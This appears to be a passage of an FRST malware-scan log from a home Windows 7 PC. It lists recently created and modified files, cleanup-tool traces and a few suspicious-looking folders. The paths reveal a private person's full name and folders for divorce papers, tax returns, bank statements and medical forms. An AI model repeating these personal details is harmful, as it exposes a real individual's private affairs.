2014-06-16 09:18 - 2010-01-21 04:10 - 12572672 _____ (IDT, Inc.) C:\Windows\system32\idtcpl64.cpl
2014-06-16 09:18 - 2010-01-21 04:10 - 03309568 _____ (IDT, Inc.) C:\Windows\system32\stlang64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 01472000 _____ (IDT, Inc.) C:\Windows\system32\stapo64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 00644608 ____N (IDT, Inc.) C:\Windows\system32\stapi64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 00564224 _____ (IDT, Inc.) C:\Windows\system32\idt64mp1.exe
2014-06-16 09:18 - 2010-01-21 04:10 - 00505856 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt64.sys
2014-06-16 09:18 - 2010-01-21 04:10 - 00431616 _____ (IDT, Inc.) C:\Windows\system32\stcplx64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 00209920 _____ (IDT, Inc.) C:\Windows\system32\st646267.dll
2014-06-16 09:18 - 2010-01-20 15:55 - 00601088 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo64.dll
2014-06-16 09:18 - 2010-01-20 15:55 - 00524288 _____ (Creative Technology Ltd.) C:\Windows\SysWOW64\ctapo32.dll
2014-06-16 09:18 - 2010-01-20 15:55 - 00524288 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo32.dll
2014-06-16 09:18 - 2010-01-12 02:03 - 00162304 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTAC64.dll
2014-06-16 09:18 - 2009-10-10 00:45 - 00442368 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTEC64.dll
2014-06-16 09:18 - 2009-05-13 03:28 - 00057856 _____ (Creative Technology Ltd.) C:\Windows\system32\ctppld64.dll
2014-06-16 09:18 - 2009-03-03 01:58 - 00068608 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTAR64.dll
2014-06-16 09:18 - 2009-03-03 01:47 - 00090624 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTCo64.dll
2014-06-16 09:13 - 2014-07-07 23:55 - 00003442 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-06-16 09:13 - 2014-07-07 23:55 - 00003204 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-06-16 09:13 - 2014-07-07 23:54 - 00003992 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\Program Files\My Dell
2014-06-16 09:09 - 2014-06-16 09:14 - 00000000 ____D () C:\temp
2014-06-16 08:57 - 2014-06-16 08:57 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell

==================== One Month Modified Files and Folders =======

2014-07-16 10:58 - 2014-07-16 10:53 - 00019485 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-16 10:53 - 2014-07-16 10:48 - 00000000 ____D () C:\FRST
2014-07-16 10:49 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-16 10:49 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-16 10:46 - 2009-07-14 01:13 - 00006728 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-16 10:45 - 2011-02-25 23:12 - 01287798 _____ () C:\Windows\WindowsUpdate.log
2014-07-16 10:41 - 2014-06-07 19:57 - 00010430 _____ () C:\Windows\setupact.log
2014-07-16 10:41 - 2013-10-06 14:24 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-16 10:41 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-16 09:35 - 2012-03-31 11:56 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-16 09:16 - 2011-08-28 11:40 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
2014-07-16 09:16 - 2011-03-25 16:29 - 00000000 ____D () C:\ProgramData\PCPitstop
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:15 - 2013-10-06 14:24 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-15 14:10 - 2011-02-25 21:53 - 00453480 _____ () C:\Users\Ric\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-14 13:32 - 2009-07-14 00:45 - 05809096 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-14 13:27 - 2011-02-26 12:01 - 00006728 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-07-14 13:16 - 2011-08-28 11:40 - 00000848 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 11:00 - 2014-07-06 11:47 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-13 14:15 - 2013-02-14 10:26 - 00413824 _____ () C:\Windows\PFRO.log
2014-07-13 14:11 - 2014-07-06 14:17 - 00000000 ____D () C:\AdwCleaner
2014-07-13 13:30 - 2014-07-05 12:52 - 00000000 ____D () C:\Roy
2014-07-12 22:46 - 2011-02-26 14:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AOL
2014-07-12 22:46 - 2011-02-26 14:13 - 00000000 ____D () C:\ProgramData\AOL
2014-07-12 22:45 - 2014-07-12 12:44 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 22:45 - 2014-07-12 12:44 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-12 22:45 - 2011-02-26 14:14 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\AOL
2014-07-12 13:01 - 2014-07-11 14:58 - 00000000 ____D () C:\Kits
2014-07-12 12:22 - 2014-01-31 12:35 - 00000367 _____ () C:\dldt.log
2014-07-12 12:22 - 2011-02-25 21:59 - 00000000 ____D () C:\Program Files (x86)\Dell
2014-07-12 11:50 - 2012-10-31 11:16 - 00000990 _____ () C:\ProgramData\dlea.log
2014-07-12 11:50 - 2011-03-03 17:30 - 00274947 _____ () C:\ProgramData\dleascan.log
2014-07-11 16:25 - 2011-02-26 12:00 - 00000000 ____D () C:\Windows\en
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-11 14:26 - 2014-06-10 08:38 - 663370964 _____ () C:\Windows\MEMORY.DMP
2014-07-11 14:26 - 2011-04-01 13:13 - 00000000 ____D () C:\Windows\Minidump
2014-07-10 12:32 - 2009-07-13 23:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-07-09 17:57 - 2013-03-21 13:42 - 00000000 ____D () C:\Windows\pss
2014-07-09 15:34 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy\1
2014-07-09 15:33 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy
2014-07-07 23:57 - 2014-06-25 20:48 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-07-07 23:56 - 2011-12-12 12:39 - 00003342 _____ () C:\Windows\System32\Tasks\{7677B741-0E06-4511-B4C6-F7582CC2898C}
2014-07-07 23:55 - 2014-06-16 09:13 - 00003442 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-07-07 23:55 - 2014-06-16 09:13 - 00003204 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-07-07 23:55 - 2011-02-26 00:21 - 00003940 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{05BF1867-8CD9-4C56-919F-A77D7EF5FBBD}
2014-07-07 23:54 - 2014-06-16 09:13 - 00003992 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-07-07 23:45 - 2011-02-27 19:51 - 00000000 ____D () C:\ProgramData\Sonic
2014-07-07 23:44 - 2013-11-28 18:33 - 00000000 ____D () C:\Program Files\Google
2014-07-07 23:44 - 2012-01-02 14:21 - 00000000 ____D () C:\Program Files (x86)\Google
2014-07-07 23:43 - 2013-12-12 09:53 - 00000000 ____D () C:\Users\Ric\Documents\POOL
2014-07-07 23:35 - 2011-08-28 11:40 - 00000000 ____D () C:\Users\Ric\AppData\Local\Google
2014-07-07 22:27 - 2014-07-01 21:05 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-07-07 22:27 - 2014-06-23 19:36 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-07-07 22:27 - 2014-06-20 21:25 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-07-07 22:27 - 2014-06-18 16:45 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-07-07 22:27 - 2014-06-16 16:04 - 00000000 ____D () C:\Users\Ric\Documents\Divorce folder
2014-07-07 22:27 - 2014-06-16 09:38 - 00000000 ____D () C:\ProgramData\QUALCOMM
2014-07-07 22:27 - 2014-06-14 15:08 - 00000000 ____D () C:\Users\Ric\Desktop\Square Pics
2014-07-07 22:27 - 2014-06-13 10:48 - 00000000 ____D () C:\Users\Ric\Desktop\Monkey Trip
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Knott karaoke files
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Fernandina and Friends Trivia Night 2014
2014-07-07 22:27 - 2014-06-03 11:38 - 00000000 ____D () C:\Users\Ric\AppData\Local\Intuit
2014-07-07 22:27 - 2014-06-01 16:23 - 00000000 ____D () C:\ProgramData\FitbitConnect
2014-07-07 22:27 - 2014-05-27 09:11 - 00000000 ____D () C:\Users\Ric\Documents\Mary divorce folder
2014-07-07 22:27 - 2014-05-21 07:51 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-14
2014-07-07 22:27 - 2014-05-17 16:47 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Parrty Cards
2014-07-07 22:27 - 2014-04-23 16:21 - 00000000 ____D () C:\Users\Ric\Documents\Chase statements
2014-07-07 22:27 - 2014-04-09 07:11 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Traditional cards
2014-07-07 22:27 - 2014-04-05 18:35 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Oldies cards
2014-07-07 22:27 - 2014-04-01 08:05 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment Blank W-9 and Square info
2014-07-07 22:27 - 2014-03-31 08:01 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment
2014-07-07 22:27 - 2014-03-23 18:47 - 00000000 ___HD () C:\Users\Ric\Documents\.picasaoriginals
2014-07-07 22:27 - 2014-03-17 17:34 - 00000000 ____D () C:\Users\Ric\Documents\BINGOEVENTpayout
2014-07-07 22:27 - 2014-03-13 17:18 - 00000000 ____D () C:\Users\Ric\Documents\Charlotte Club Music Trivia
2014-07-07 22:27 - 2014-02-28 12:18 - 00000000 ____D () C:\Users\Ric\Documents\Water Oak Trivia
2014-07-07 22:27 - 2014-02-26 10:00 - 00000000 ____D () C:\Users\Ric\Documents\Bingo Card Diagrams
2014-07-07 22:27 - 2014-02-24 09:23 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Return Package Orlando
2014-07-07 22:27 - 2014-02-13 10:47 - 00000000 ____D () C:\Users\Ric\Documents\Celebration Athletes app licationRicMitchellw92013
2014-07-07 22:27 - 2013-12-19 13:03 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Package Orlando
2014-07-07 22:27 - 2013-09-24 12:02 - 00000000 ____D () C:\Users\Ric\AppData\Local\CE614ED5-C555-4E18-B719-E22F8ED8BAE5.aplzod
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\POLO RIDGE TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\MALLORY TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\Citrus Hill Music File questions
2014-07-07 22:27 - 2013-06-02 16:22 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-13
2014-07-07 22:27 - 2013-05-30 09:19 - 00000000 ____D () C:\Users\Ric\AppData\Local\Amazon Cloud Player
2014-07-07 22:27 - 2013-05-23 17:28 - 00000000 ___HD () C:\ProgramData\CanonBJ
2014-07-07 22:27 - 2013-04-12 17:36 - 00000000 ____D () C:\Users\Ric\Documents\Trivia_Ladder_Trivia_Sets
2014-07-07 22:27 - 2013-03-26 09:18 - 00000000 ____D () C:\Users\Ric\Documents\Theatre ALLBIOS
2014-07-07 22:27 - 2013-03-06 09:41 - 00000000 ____D () C:\Users\Ric\Documents\Sharon ApplicationforResidency
2014-07-07 22:27 - 2013-02-05 10:04 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mitchell Q&A OnlineTriviaInsert
2014-07-07 22:27 - 2013-01-22 09:19 - 00000000 ___HD () C:\Users\Ric\Desktop\.picasaoriginals
2014-07-07 22:27 - 2012-12-11 08:53 - 00000000 ____D () C:\Users\Ric\Documents\2012 Tax Return and Packet
2014-07-07 22:27 - 2012-11-15 13:45 - 00000000 ____D () C:\Users\Ric\Documents\ACX
2014-07-07 22:27 - 2012-11-04 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Scott Trivia Documnets
2014-07-07 22:27 - 2012-10-18 09:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2013
2014-07-07 22:27 - 2012-08-30 09:24 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book IllustrationsSoFarLoRes
2014-07-07 22:27 - 2012-08-29 13:47 - 00000000 ____D () C:\Users\Ric\Documents\VillagesBacallRecinvoiceSockHop
2014-07-07 22:27 - 2012-08-27 09:01 - 00000000 ____D () C:\Users\Ric\Documents\Cigna Medical Forms
2014-07-07 22:27 - 2012-08-05 18:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3
2014-07-07 22:27 - 2012-07-30 18:09 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book
2014-07-07 22:27 - 2012-06-17 15:48 - 00000000 ____D () C:\Users\Ric\Documents\TOPHITSOF1981
2014-07-07 22:27 - 2012-05-30 07:34 - 00000000 ____D () C:\Users\Ric\Documents\W-9 Form-2011 Blank
2014-07-07 22:27 - 2012-04-07 07:51 - 00000000 ____D () C:\Users\Ric\Documents\1940 UnitedStatesFederalCensus(Beta)
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\Moving notes
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\2011 Tax package Orlando
2014-07-07 22:27 - 2012-02-06 20:07 - 00000000 ____D () C:\Users\Ric\Documents\Drew Addtional files
2014-07-07 22:27 - 2012-01-26 10:23 - 00000000 ____D () C:\Users\Ric\Documents\Consumer Cellular
2014-07-07 22:27 - 2012-01-19 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Daily Sun ads
2014-07-07 22:27 - 2012-01-14 13:54 - 00000000 ___SD () C:\Users\Ric\Documents\My Data Sources
2014-07-07 22:27 - 2012-01-11 10:45 - 00000000 ____D () C:\Users\Ric\Documents\Ameriprise statements
2014-07-07 22:27 - 2011-12-22 09:51 - 00000000 ____D () C:\Users\Ric\Documents\Rental lease 2
2014-07-07 22:27 - 2011-10-19 12:00 - 00000000 ____D () C:\Users\Ric\Desktop\TheGameShowManLogo1
2014-07-07 22:27 - 2011-10-13 12:24 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2012
2014-07-07 22:27 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3 Uploader
2014-07-07 22:27 - 2011-08-17 16:07 - 00000000 ____D () C:\Users\Ric\Documents\2009D'AMICO tax return
2014-07-07 22:27 - 2011-03-13 15:17 - 00000000 ____D () C:\Users\Ric\Documents\skoop special
2014-07-07 22:27 - 2011-03-10 16:09 - 00000000 ____D () C:\Users\Ric\AppData\Local\Broderbund Software
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ___RD () C:\Users\Ric\Documents\My Dropbox
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Documents\BlackBerry
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Desktop\Website text and files
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Ric\Carbonite Restored OLD User Settings
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Public\Documents\yoostar
2014-07-07 22:27 - 2011-03-03 17:13 - 00000000 ____D () C:\Users\Ric\Documents\DAmico-Fitzgerald Tax Return 2010
2014-07-07 22:27 - 2011-03-01 14:05 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mary Pics
2014-07-07 22:27 - 2011-02-28 18:19 - 00000000 ____D () C:\Users\Ric\Documents\skoop
2014-07-07 22:27 - 2011-02-28 09:14 - 00000000 ____D () C:\ProgramData\McAfee
2014-07-07 22:27 - 2011-02-27 20:26 - 00000000 ____D () C:\Users\Ric\AppData\Local\CatalystMC
2014-07-07 22:27 - 2011-02-27 19:46 - 00000000 ____D () C:\ProgramData\PhotoShow Shared Assets
2014-07-07 22:27 - 2011-02-27 15:24 - 00000000 ____D () C:\Users\Ric\Documents\Dell WebCam Central
2014-07-07 22:27 - 2011-02-26 18:06 - 00000000 ____D () C:\Users\Ric\Documents\Bank of America
2014-07-07 22:27 - 2011-02-26 17:49 - 00000000 ___RD () C:\Users\Ric\Dropbox
2014-07-07 22:27 - 2011-02-26 17:45 - 00000000 ____D () C:\ProgramData\Intuit
2014-07-07 22:27 - 2011-02-26 14:13 - 00000000 ____D () C:\Users\Ric\AppData\Local\AOL
2014-07-07 22:27 - 2011-02-26 13:26 - 00000000 ____D () C:\Users\Ric\Documents\Outlook Files
2014-07-07 22:27 - 2011-02-26 01:39 - 00000000 ____D () C:\ProgramData\Logishrd
2014-07-07 22:27 - 2011-02-26 01:21 - 00000000 ____D () C:\Users\Ric\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:59 - 00000000 ____D () C:\Users\Public\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Local\Apple Computer
2014-07-07 22:27 - 2011-02-25 21:20 - 00000000 ____D () C:\Users\Ric
2014-07-07 12:45 - 2014-02-06 09:50 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\vlc
2014-07-07 12:45 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\com.amazon.music.uploader
2014-07-07 12:45 - 2011-05-25 13:27 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dell
2014-07-07 12:45 - 2011-03-01 17:08 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\eFax Messenger
2014-07-07 12:45 - 2011-02-27 20:00 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Roxio
2014-07-07 12:45 - 2011-02-26 17:47 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dropbox
2014-07-07 12:45 - 2011-02-26 17:46 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Intuit
2014-07-07 12:45 - 2011-02-26 17:44 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Tether
2014-07-07 12:45 - 2011-02-26 16:55 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Real
2014-07-07 12:45 - 2011-02-26 14:38 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PACE Anti-Piracy
2014-07-07 12:45 - 2011-02-26 00:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PCDr
2014-07-07 12:42 - 2013-05-25 14:16 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\ArcSoft
2014-07-07 12:42 - 2013-05-23 17:51 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\canon
2014-07-07 12:42 - 2011-04-04 11:35 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Amazon
2014-07-07 12:42 - 2011-02-26 00:45 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Adobe
2014-07-07 12:42 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Apple Computer
2014-07-07 12:19 - 2011-02-27 10:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 13:39 - 2014-06-25 19:50 - 00000000 ____D () C:\ProgramData\IculOnse
2014-07-06 13:39 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:17 - 2014-01-08 09:57 - 00035352 _____ () C:\Users\Ric\Downloads\Jay and The Americans    March 2014.xls
2014-07-05 14:17 - 2011-10-24 12:08 - 01349912 _____ () C:\Users\Ric\Downloads\header.fla
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013.xls
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013 (1).xls
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014.xls
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014 (1).xls
2014-07-05 13:53 - 2011-03-09 16:32 - 00034328 _____ () C:\Users\Ric\Documents\watermark[540].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00018712 _____ () C:\Users\Ric\Documents\watermark[396].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00009752 _____ () C:\Users\Ric\Documents\watermark[288].tga
2014-07-05 13:49 - 2012-09-22 12:31 - 00022040 _____ () C:\Users\Ric\Documents\TOPHITSOF1973.xls
2014-07-05 13:49 - 2012-05-21 09:14 - 00023576 _____ () C:\Users\Ric\Documents\TOPHITSOF1968.xls
2014-07-05 13:49 - 2012-01-14 09:52 - 00009240 _____ () C:\Users\Ric\Documents\Team Trivia Board.xlsx
2014-07-05 13:49 - 2011-03-17 14:55 - 13156376 _____ () C:\Users\Ric\Documents\SUNY speech.pptx
2014-07-05 13:48 - 2012-05-28 07:48 - 00023576 _____ () C:\Users\Ric\Documents\SUMMERSONGS.xls
2014-07-05 13:48 - 2011-10-28 15:25 - 00039192 _____ () C:\Users\Ric\Documents\Star Phone Listing.xls
2014-07-05 13:48 - 2011-04-17 13:39 - 13158168 _____ () C:\Users\Ric\Documents\SUNY speech FINAL.pptx
2014-07-05 13:47 - 2012-08-04 13:59 - 00027416 _____ () C:\Users\Ric\Documents\ROOTSOFROCKNROLL.xls
2014-07-05 13:46 - 2011-09-21 17:53 - 00875288 _____ () C:\Users\Ric\Documents\Rickaraoketextfile.xls
2014-07-05 13:41 - 2012-09-23 13:25 - 08316373 ____T () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.wmv
2014-07-05 13:41 - 2012-09-23 13:03 - 01148184 _____ () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.pptx
2014-07-05 13:39 - 2013-08-24 17:25 - 00022552 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2014.xlsx
2014-07-05 13:39 - 2013-05-15 10:02 - 00080920 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2013-Part 2.xls
2014-07-05 13:39 - 2013-01-07 10:49 - 00082968 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2012.xls
2014-07-05 13:39 - 2012-08-24 09:47 - 00012312 _____ () C:\Users\Ric\Documents\Red Hat.xlsx
2014-07-05 13:39 - 2012-04-24 11:46 - 00077080 _____ () C:\Users\Ric\Documents\PartyBaseVillages2.xls
2014-07-05 13:39 - 2012-01-06 10:55 - 00081944 _____ () C:\Users\Ric\Documents\PartyBaseVillages.xls
2014-07-05 13:39 - 2011-02-27 12:18 - 00407832 _____ () C:\Users\Ric\Documents\PartyBase.xlr
2014-07-05 13:36 - 2012-08-17 08:48 - 00013080 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster with birthdays.xlsx
2014-07-05 13:36 - 2012-08-16 11:09 - 00013336 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster.xlsx
2014-07-05 13:36 - 2012-07-03 17:35 - 00032792 _____ () C:\Users\Ric\Documents\Knott Take It Or Leave It.xlsx
2014-07-05 13:36 - 2012-07-03 16:54 - 00032536 _____ () C:\Users\Ric\Documents\Knott Blank amended Ric Trivia sheet for multiple teams-.xlsx
2014-07-05 13:36 - 2012-04-13 10:51 - 00012824 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster-04-12.xlsx
2014-07-05 13:36 - 2012-01-18 10:06 - 00056344 _____ () C:\Users\Ric\Documents\Knott Template blank Tamarind Grove GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 10:03 - 00056856 _____ () C:\Users\Ric\Documents\Knott Template blank trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 09:58 - 00054040 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-17 12:25 - 00033048 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet for multiple teams.xlsx
2014-07-05 13:36 - 2012-01-17 12:20 - 00031256 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet.xlsx
